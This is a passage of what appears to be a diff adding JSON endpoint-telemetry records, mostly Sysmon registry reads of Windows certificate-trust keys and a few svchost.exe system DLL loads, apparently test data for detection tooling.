"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "rmclient.dll", + "image_path": "C:\\Windows\\System32\\rmclient.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "coml2.dll", + "image_path": "C:\\Windows\\System32\\coml2.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "OneCoreCommonProxyStub.dll", + "image_path": "C:\\Windows\\System32\\OneCoreCommonProxyStub.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570902150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": 